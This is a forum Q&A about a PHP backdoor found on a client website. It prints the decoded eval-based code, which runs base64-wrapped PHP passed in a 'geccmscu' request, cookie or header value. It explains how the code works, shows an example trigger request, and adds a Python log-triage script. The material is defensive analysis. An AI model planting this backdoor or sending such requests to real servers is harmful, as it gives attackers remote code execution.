What is this PHP code doing? Looks like a hack
I found this code in the root of the client site. I decoded it as follows:
$brownies = create_function( ' ', eval(array_pop(func_get_args())); );
$brownies('L','9','$','>','','K','H','B','m', $i=array_merge($_REQUEST,$_COOKIE,$_SERVER); $a=isset($i["geccmscu"]) ? $i["geccmscu"] : (isset($i["HTTP_GECCMSCU"]) ? $i["HTTP_GECCMSCU"] : die ); eval(strrev(base64_decode(strrev($a)))););
It looks like it gets the code from the cookie or user and evaluates it, but I can't tell further from there.
Does anyone have any understanding of this?
Here's some indented code:
$brownies = create_function( ' ', eval(array_pop(func_get_args())); );
$brownies('L','9','$','>','','K','H','B','m',
    $i=array_merge($_REQUEST,$_COOKIE,$_SERVER);
    $a=isset($i["geccmscu"]) ? $i["geccmscu"] :
        (isset($i["HTTP_GECCMSCU"]) ? $i["HTTP_GECCMSCU"] : die );
    eval(strrev(base64_decode(strrev($a)))););
First it checks if the key "geccmscu" is among the cookies, requests and server values (variable $i). If not, it checks if a header with the same name ("HTTP_GECCMSCU") is defined. If not, the script stops.
If this "geccmscu" variable has been defined somewhere, it is stored in $a. The script then decodes it (content is "encrypted" with strrev and base64) and executes it through eval().
Basically, someone could attack your server with an HTTP request, for example:
GET http://example.com?geccmscu=someevilphpcode
Then "someevilphpcode" will be decoded and executed on your server.
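Added example, not part of the original question or answer: a Python triage script for the site's access log that finds requests carrying the "geccmscu" parameter and reverses the strrev/base64/strrev wrapping to show what the backdoor was asked to eval. The log lines, the /x.php path and the function names are constructed for illustration; a standard access log only shows the query string, so values sent by POST body, cookie or header will not appear here.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

PARAM = "geccmscu"  # parameter name taken from the backdoor shown on this page

# Constructed sample log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=2 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /x.php?geccmscu=%3D%3DQZjh2bgEzO HTTP/1.1" 200 1',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /x.php?geccmscu=%25%25notbase64 HTTP/1.1" 200 0',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def decode_payload(value):
    """Undo strrev(base64_decode(strrev($a))) to recover the PHP that would be eval'd."""
    try:
        raw = base64.b64decode(value[::-1], validate=True)
    except (binascii.Error, ValueError):
        return None  # not well-formed base64; the request is still worth flagging
    return raw[::-1].decode("utf-8", errors="replace")


def find_backdoor_requests(lines):
    """Return (line_number, decoded_or_None) for every request carrying PARAM."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for value in query.get(PARAM, []):
            hits.append((n, decode_payload(value)))
    return hits


if __name__ == "__main__":
    for n, code in find_backdoor_requests(SAMPLE_LOG):
        print(n, repr(code))
```

A hit with a decoded value shows what was executed on the server; a hit that decodes to None still means someone probed for the backdoor.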